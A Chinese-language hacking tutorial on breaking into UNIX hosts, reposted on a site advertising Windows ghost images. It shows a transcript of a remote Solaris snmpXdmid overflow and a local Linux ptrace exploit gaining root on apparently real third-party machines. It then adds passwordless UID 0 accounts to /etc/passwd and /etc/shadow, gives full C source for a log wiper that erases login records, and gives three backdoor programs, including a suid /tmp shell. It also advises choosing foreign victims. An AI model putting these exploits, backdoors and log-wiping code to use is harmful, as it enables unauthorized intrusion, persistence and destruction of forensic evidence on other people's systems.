浅谈入侵UNIX
一:基本知识
1:常见UNIX版本:
SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,Mks Toolkit,NetNSD,OSF/I,System V Unix,Unicos,Unix ware...
2:简单介绍几个
sunos&solaris SUN本来想用solaris取代sunos,不过在用户的要求下,到目前为止,还是维持两者并存的政策;
Freebsd是著名的BSD-UNIX的一的继承者,是UNIX众多分支中相当稳定的一个,很多ISP均使用运行Freebsd;
Linux是一个面对PC机个人用户的自由廉价的UNIX产品(其硬件平台是Intel系列的CPU),实际上众多的网络管理员真正使用的是Linux。
3:UNIX操作系统的特点
(1)多用户和多任务;(2)可移植性;(3)树行结构的文件系统;(4)I/O重定向技术和管道技术;(5)丰富的实用程序;(6)每个用户都有电子邮件。
4:尤为突出的优点
(1)稳定可靠性高;(2)网络功能强;(3)开发性好;(4)强大的数据库支持功能;(5)伸缩性强。
二:入侵目的
1:学习UNIX,熟悉内部操作,整体配置...
2:做跳板或以此捕捉更多UNIX肉鸡;
3:越权得到某些正常请求下得不到的东西;
4:攻击破坏或以此作为利器来破坏其他系统;
5:更多......
三:入侵方法
1:寻找目标
工具:supperscan,流光,LANguard Network Scanner 2.0或者其他,凭个人喜好选用
supperscan:扫描23,79端口,注意含%,#,&...主机,这些就是UNIX;
LANguard..作简单设置,即可开始,判断对方操作系统功能乃同类软件中的精品,直观准确;
流光:利用高级扫描,选telnet,PRC,POP3,FTP,Finger即可。
其他方法一样...
(说明:很多管理员为了迷惑入侵者往往故意更改telnet登陆时出现的信息,请注意识别)
2:开始入侵
(1)溢出(所有关于UNIX的溢出,都需要在一个UNIX/Linux的环境下进行编译)
A:远程溢出
溢出?呵呵,太多了!随便说几个:freebsd远程溢出,bind 远程溢出,Sun Solaris 5.7/5.8 Sparc远程溢出,redhat6.xrpc status远程溢出...自己去一一了解吧,在这里我简单说两个例子:
a1:考虑到很多朋友使用windows,所以大家可以参看我的兄弟---蓝骑士的大作《freebsd溢出完全图文版》(地址:http://www.itser.com/ez/.bbs/topic.cgi?forum=7&topic=25&show=),因为这个溢出程序有已经编译好了可以直接在windows下使用;
a2:Sun Solaris 5.7 Sparc远程溢出
搜索...终于让我找到了一台sunos 5.7,上我一台sunos 5.8
telnet 66.*.146.48 ----->>这是我的!
SunOS 5.8
login: ply
Password:
Last login: Tue Apr 23 03:55:09 from 39448.ddn.xaonli
Sun Microsystems Inc. SunOS 5.8 Generic February 2000
$ tmp/.sh ----->>当时溢出时做的处理!
ls
bin data etc initrd mnt proc sbin usr
boot dev home lib misc opt root tmp var
xfn skip
cat >snmp.c
....... ----->>太长了,省略...自己去找!
gcc -o snmp snmp.c ----->>用gcc编译
snmp.c: In function `main':
snmp.c:181: warning: passing arg 3 of pointer to function from incompatible pointer type
snmp.c:181: warning: passing arg 4 of pointer to function from incompatible pointer type
snmp.c:181: warning: passing arg 5 of pointer to function from incompatible pointer type
ls
bin data etc initrd mnt proc sbin snmp usr
boot dev home lib misc opt root snmp.c tmp var
./snmp
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
usage: ./s address [-p port] -v 7|8
./snmp 216.*.45.63 -v 7 ---->开始溢出!!
DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
adr=0x000c8f68 timeout=30 port=928 connected!
sent!
SunOS app1-stg-bk-sh 5.7 Generic_106541-09 sun4u sparc SUNW,Ultra-80
id
uid=0(root) gid=0(root) ----->>是root哦!
echo "ply::0:0::/:/bin/bash" >> /etc/passwd ----->>加个用户先!
echo "ply::::::::" >>/etc/shadow
... ----->>还想干什么就继续吧!
B:本地溢出
本地溢出需要一个具有Shell权限的帐号,这个帐号可以通过pop3或ftp弱密码得到,照样举个例子:
流光扫描...一会儿得到了一个ftp帐号(webmaster,webmaster),先telnet上去!
telnet *.174.62.135
Red Hat Linux release 6.2 (Cartman) ----->>linux 6.2,容易搞定!
Kernel 2.2.12-20kr2smp on an i686
login: webmaster
Password:
Last login: Wed Apr 24 02:21:58 from ...
You have mail. ----->>这家伙有新邮件,不过我没兴趣!
[webmaster@ns webmaster]$ ----->>气人的普通用户$
[webmaster@ns webmaster]$cat >ts.c
... ----->>要学会利用网络资源,自己找,当是练习!
[webmaster@ns webmaster]$gcc -o ts ts.c ----->>还是用gcc编译。
In file included from /usr/include/asm/user.h:5,
from /usr/include/linux/user.h:1,
from ts.c:30:
/usr/include/linux/ptrace.h:22: warning: `PTRACE_SYSCALL' redefined
/usr/include/sys/ptrace.h:103: warning: this is the location of the previous def
inition
[webmaster@ns webmaster]$ ls
Desktop/ Mail/ ts* ts.c
[webmaster@ns webmaster]$ ./ts
attached
bash# su root
[root@ns webmaster]# ----->>搞定,看见#我就高兴!
[root@ns webmaster]# cat >wipe.c ----->>扫脚印的,这个还是给大家吧,否则有人要扁我了!
include
include
include
include
ifdef UTMAXTYPE
define UTMPX
include
endif
include
ifndef _PATH_LASTLOG
include
endif
include
include
include
define SVR4_UTMP "/var/adm/utmp"
define SVR4_WTMP "/var/adm/wtmp"
define SVR4_LASTLOG "/var/adm/lastlog"
define SUNOS4_UTMP "/etc/utmp"
define SUNOS4_WTMP "/usr/adm/wtmp"
define SUNOS4_LASTLOG "/usr/adm/lastlog"
define BSD_UTMP "/var/run/utmp"
define BSD_WTMP "/var/log/wtmp"
define BSD_LASTLOG "/var/log/lastlog"
define MAX_FPATH 512
int wipe_log(path,user,type)
charpath,user;
int type;
{
struct utmp utmp_ent;
ifdef UTMPX
struct utmpx utmpx_ent;
endif
void *ent;
char *un;
int sz,fd,c=0;
if (strlen(path)==0) return(1);
if (type==0){
ent=(void *)&utmp_ent;
ifdef UTMPX
un=(char *)&utmp_ent.ut_user;
else
un=(char *)&utmp_ent.ut_name;
endif
sz=sizeof(struct utmp);
}else{
ifdef UTMPX
ent=(void *)&utmpx_ent;
un=(char *)&utmpx_ent.ut_user;
sz=sizeof(struct utmpx);
endif
}
if ((fd=open(path,O_RDWR))<=0) return(-1);
while(read(fd,ent,sz)>0)
if (!strncmp(un,user,strlen(user))){
memset(ent,0,sz);
lseek(fd,-sz,SEEK_CUR);
write(fd,ent,sz);
c;
}
close(fd);
printf("Wiped %d entries of %s from %s.",c,user,path);
return(0);
}
int wipe_lastlog(path,user,type)
charpath,user;
int type;
{
struct passwd *p;
struct lastlog ent;
int fd;
char buffer[MAX_FPATH];
if (type==0) strcpy(buffer,path);
else sprintf(buffer,"%s/%s",path,user);
memset(&ent,0,sizeof(struct lastlog));
if ((p=getpwnam(user))==NULL) return(-1);
if ((fd=open(buffer,O_RDWR))<=0) return(-2);
if (type==0)
lseek(fd,p->CNSU_uid*sizeof(struct lastlog),SEEK_SET);
write(fd,&ent,sizeof(struct lastlog));
close(fd);
printf("Wiped %s from %s.",user,path);
return(0);
}
main(argc,argv)
int argc;
char *argv[];
{
char f_utmp[MAX_FPATH],f_utmpx[MAX_FPATH];
char f_wtmp[MAX_FPATH],f_wtmpx[MAX_FPATH];
char f_lastlog[MAX_FPATH];
struct utsname utname;
int lastlog_type;
if (argc!=2){
printf("Usage: %s Usernane",argv[0]);
exit(1);
}
if (getpwnam(argv[1])==NULL){
printf("Unknown user : %s",argv[1]);
exit(1);
}
uname(&utname);
strcpy(f_wtmpx,""); strcpy(f_utmpx,"");
if (!strcmp(utname.sysname,"SunOS")){
ifdef UTMPX
strcpy(f_utmp, SVR4_UTMP);
strcpy(f_wtmp, SVR4_WTMP);
strcpy(f_utmpx, UTMPX_FILE);
strcpy(f_wtmpx, WTMPX_FILE);
strcpy(f_lastlog, SVR4_LASTLOG);
lastlog_type=0;
else
strcpy(f_utmp, SUNOS4_UTMP);
strcpy(f_wtmp, SUNOS4_WTMP);
strcpy(f_lastlog, SUNOS4_LASTLOG);
lastlog_type=0;
endif
}else if (!strcmp(utname.sysname,"Linux")
|| !strcmp(utname.sysname,"FreeBSD")){
strcpy(f_utmp, BSD_UTMP);
strcpy(f_wtmp, BSD_WTMP);
strcpy(f_lastlog, BSD_LASTLOG);
}else if (!strcmp(utname.sysname,"IRIX")){
ifdef UTMPX
strcpy(f_utmp, SVR4_UTMP);
strcpy(f_wtmp, SVR4_WTMP);
strcpy(f_utmpx, UTMPX_FILE);
strcpy(f_wtmpx, WTMPX_FILE);
strcpy(f_lastlog, SVR4_LASTLOG);
lastlog_type=1;
else
printf("Can not wipe. System Unknown.");
endif
}else
printf("Can not wipe. System Unknown.");
wipe_log(f_utmp, argv[1],0);
wipe_log(f_utmpx,argv[1],1);
wipe_log(f_wtmp, argv[1],0);
wipe_log(f_wtmpx,argv[1],1);
wipe_lastlog(f_lastlog,argv[1],lastlog_type);
}
^d
[root@ns webmaster]# gcc -o wipe wipe.c
[root@ns webmaster]# ./wipe webmaster ----->>./wipe username就可以扫掉脚印了!
(2)扫描弱口令或暴力破解口令
A:弱口令使用于大范围搜捕,即利用少量常见多用密码去推测大量主机的telnet,ftp或pop3
B:暴力破解适用于针对某一主机,比如说利用finger获得了用户列表,即可采用字典攻击!或者说利用其他漏洞(如phf漏洞)获得了passwd,shadow文件,可以拿john或者乱刀解破,能否解破?看运气!
(3)利用特洛伊木马窃取口令(我没有这么做过,但这不失为一种方法)
(4)网络监听和数据截取(大家和我一起努力吧,努力学会利用这种方法:P)
(5)这里给大家几个简单的后门程序,复杂的自己去看!
a1:口令文件 passwd 中增加一个 UID 为 0 的帐号
include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a ");
fprintf(fd,"hax0r::0:0::/root:/bin/sh");
}
a2:在 /tmp 目录下放置 suid shell
include
main()
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
a3:管理员偶然地输入cd..时向/etc/passwd文件添加一个UID 0 帐号
include
include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a ");
fprintf(fd,"hax0r::0:0::/root:/bin/sh");
system("cd");
}
(6)攻击(特别是溢出)的方式很多,但方法大多大同小异,故不再赘叙!
四:补充说明
1:如用supperscan发现某ip段存在大量unix主机,马上转用弱口令破解;或发现某连续ip段全是同一个unix版本操作系统,则此ip段很有可能是某大公司,企业,高校或其他,一般防护甚严,不存在溢出漏洞,无需逐一尝试溢出,随便选两三个试试看行不行;
2:到信息产业发达的国家去找,比如说美国,日本...不要找国内的,又少又危险!
3:若发现telnet不上上次成功溢出的肉鸡,说明此肉鸡的ip是动态的,但ip改变不会太大,在临近ip再搜一遍即可!
五:强调说明
不要简单地认为你已经轻易地檫干净了你的入侵痕迹,很多有经验的管理员都把日志文件转到了其他主机上或作相关安全处理,一旦管理员发现了入侵,他会从如下方面来分析攻击者的入侵方式,你应该以此做出相应的应对措施:
1:查找系统文件和系统培植文件的变化;
2:查找数据文件的变化;
3:查找入侵留下的数据文件和相关工具;
4:检查日志文件
5:查找出网络监听的迹象
6:检查局域网上的其他计算机。
六:本文中存在的缺点错误还望容忍并多加批评与指正!本文欢迎转载,但请务必保持全文完整!
七:警告,请清醒地估量你的行为可能带来的后果!
推荐系统
windows11中文版镜像 微软win11正式版简体中文GHOST ISO镜像64位系统下载
语言:中文版系统大小:5.31GB系统类型:Win11windows11中文版镜像 微软win11正式版简体中文GHOST ISO镜像64位系统下载,微软win11发布快大半年了,其中做了很多次补丁和修复一些BUG,比之前的版本有一些功能上的调整,目前已经升级到最新版本的镜像系统,并且优化了自动激活,永久使用。windows11中文版镜像国内镜像下载地址微软windows11正式版镜像 介绍:1、对函数算法进行了一定程度的简化和优化
微软windows11正式版GHOST ISO镜像 win11下载 国内最新版渠道下载
语言:中文版系统大小:5.31GB系统类型:Win11微软windows11正式版GHOST ISO镜像 win11下载 国内最新版渠道下载,微软2022年正式推出了win11系统,很多人迫不及待的要体验,本站提供了最新版的微软Windows11正式版系统下载,微软windows11正式版镜像 是一款功能超级强大的装机系统,是微软方面全新推出的装机系统,这款系统可以通过pe直接的完成安装,对此系统感兴趣,想要使用的用户们就快来下载
微软windows11系统下载 微软原版 Ghost win11 X64 正式版ISO镜像文件
语言:中文版系统大小:0MB系统类型:Win11微软Ghost win11 正式版镜像文件是一款由微软方面推出的优秀全新装机系统,这款系统的新功能非常多,用户们能够在这里体验到最富有人性化的设计等,且全新的柔软界面,看起来非常的舒服~微软Ghost win11 正式版镜像文件介绍:1、与各种硬件设备兼容。 更好地完成用户安装并有效地使用。2、稳定使用蓝屏,系统不再兼容,更能享受无缝的系统服务。3、为
雨林木风Windows11专业版 Ghost Win11官方正式版 (22H2) 系统下载
语言:中文版系统大小:4.75GB系统类型:雨林木风Windows11专业版 Ghost Win11官方正式版 (22H2) 系统下载在系统方面技术积累雄厚深耕多年,打造了国内重装系统行业的雨林木风品牌,其系统口碑得到许多人认可,积累了广大的用户群体,雨林木风是一款稳定流畅的系统,一直以来都以用户为中心,是由雨林木风团队推出的Windows11国内镜像版,基于国内用户的习惯,做了系统性能的优化,采用了新的系统
雨林木风win7旗舰版系统下载 win7 32位旗舰版 GHOST 免激活镜像ISO
语言:中文版系统大小:5.91GB系统类型:Win7雨林木风win7旗舰版系统下载 win7 32位旗舰版 GHOST 免激活镜像ISO在系统方面技术积累雄厚深耕多年,加固了系统安全策略,雨林木风win7旗舰版系统在家用办公上跑分表现都是非常优秀,完美的兼容各种硬件和软件,运行环境安全可靠稳定。win7 32位旗舰装机版 v2019 05能够帮助用户们进行系统的一键安装、快速装机等,系统中的内容全面,能够为广大用户
番茄花园Ghost Win7 x64 SP1稳定装机版2022年7月(64位) 高速下载
语言:中文版系统大小:3.91GB系统类型:Win7欢迎使用 番茄花园 Ghost Win7 x64 SP1 2022.07 极速装机版 专业装机版具有更安全、更稳定、更人性化等特点。集成最常用的装机软件,集成最全面的硬件驱动,精心挑选的系统维护工具,加上独有人性化的设计。是电脑城、个人、公司快速装机之首选!拥有此系统
番茄花园 Windows 10 极速企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10番茄花园 Windows 10 32位极速企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
新萝卜家园电脑城专用系统 Windows10 x86 企业版 版本1507 2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新萝卜家园电脑城专用系统 Windows10 x86企业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
相关文章
- DanaBot恶意软件卷土重来
- 微软确认存在另一个新的Windows Print Spooler安全漏洞
- Kraken: 无文件APT攻击滥用Windows错误报告服务
- 为什么windows错误恢复?
- 网络安全攻防:Web安全之CSRF
- 建设网络安全,护卫国家安全,专家说要这样做!
- 占着星,P着图,一不小心就落入App 4亿美元的圈套
- 漏洞5万美元一个贵不贵?
- 紧急情况—在Microsoft Exchange中发现了4个频繁利用的0 day漏洞
- 专栏
- 黑客从 Poly Network 窃取价值6 亿美元加密货币
- 全球疫情期间网络安全创业六大趋势
- php intval()函数使用不当的安全漏洞分析
- PPLive存在ActiveX类型溢出漏洞
热门系统
- 1华硕笔记本&台式机专用系统 GhostWin7 32位正式旗舰版2018年8月(32位)ISO镜像下载
系统大小:3.13GB系统类型:Win7 - 2深度技术 Windows 10 x86 企业版 电脑城装机版2018年10月(32位) ISO镜像免费下载
系统大小:3.98GB系统类型:Win10 - 3电脑公司 装机专用系统Windows10 x86喜迎国庆 企业版2020年10月(32位) ISO镜像快速下载
系统大小:3.98GB系统类型:Win10 - 4雨林木风 Ghost Win7 SP1 装机版 2020年4月(32位) 提供下载
系统大小:3.13GB系统类型:Win7 - 5深度技术 Windows 10 x86 企业版 六一节 电脑城装机版 版本1903 2022年6月(32位) ISO镜像免费下载系统大小:3.98GB系统类型:Win10
- 6深度技术 Windows 10 x64 企业版 电脑城装机版2021年1月(64位) 高速下载
系统大小:3.98GB系统类型:Win10 - 7新萝卜家园电脑城专用系统 Windows10 x64 企业版2019年10月(64位) ISO镜像免费下载
系统大小:3.98GB系统类型:Win10 - 8新萝卜家园 GhostWin7 SP1 最新电脑城极速装机版2018年8月(32位)ISO镜像下载
系统大小:3.13GB系统类型:Win7 - 9电脑公司Ghost Win8.1 x32 精选纯净版2022年5月(免激活) ISO镜像高速下载
系统大小:3.45GB系统类型:Win8 - 10新萝卜家园Ghost Win8.1 X32 最新纯净版2018年05(自动激活) ISO镜像免费下载
系统大小:3.45GB系统类型:Win8
热门文章
- 1迅雷云播“手机看片神器”使用教程(随时随地秒速离线云播放)
- 2微信公众号怎么年审? 微信公众号年审流程及所需材料介绍
- 3Win10怎么设置网络按流量计费 Win10网络设置流量收费教程
- 4i7 6700主频是多少 i7-6700参数详解
- 5Steam提示“需要在线进行更新,请确认您的网络连接正常”怎么办?
- 6win7蓝屏代码7f指什 怎么解决 很严重
- 7安卓手机安装运行win7系统教程 安卓手机装win7系统教程
- 8aoc一体机电脑win10改win7系统及bios设置
- 9华硕b460主板装win7系统及bios设置教程 10代CPU安装Win7教程 BIOS设置 U盘启动 完美支持USB驱动
- 10高通骁龙8cx怎么样 高通骁龙8cx处理器详细介绍
常用系统
- 1深度技术 GHOSTXPSP3 电脑城极速装机版 2019年4月 最新版ISO镜像下载
系统大小:3.96GB系统类型:WinXP - 2新萝卜家园电脑城专用系统 Windows10 x64 极速企业版2018年8月(64位)ISO镜像下载
系统大小:3.98GB系统类型:Win10 - 3番茄花园 Windows 10 官方企业版 2019年8月(64位) ISO高速下载
系统大小:3.98GB系统类型:Win10 - 4电脑公司Ghost Win8.1 x64 多驱动纯净版2018年7月(激活版) 最新版ISO镜像下载
系统大小:3.96GB系统类型:Win8 - 5深度技术 Ghost Win7 x64 Sp1 电脑城纯净版2020年11月(64位) ISO镜像高速下载
系统大小:3.91GB系统类型:Win7 - 6深度技术 Windows 10 x64 企业版 电脑城装机版 版本1903 2022年3月(64位) 高速下载系统大小:3.98GB系统类型:Win10
- 7新萝卜家园电脑城专用系统 Windows10 x64 企业版 版本1903 2022年5月(64位) ISO镜像免费下载系统大小:3.98GB系统类型:Win10
- 8新萝卜家园Ghost Win8.1 X32 纯净版2018年4月(无需激活) ISO镜像快速下载
系统大小:3.45GB系统类型:Win8 - 9笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年5月(32位) ISO镜像快速下载
系统大小:3.98GB系统类型:Win10 - 10电脑公司Ghost Win8.1 x32 精选纯净版2018年4月(免激活) ISO镜像快速下载系统大小:3.45GB系统类型:Win8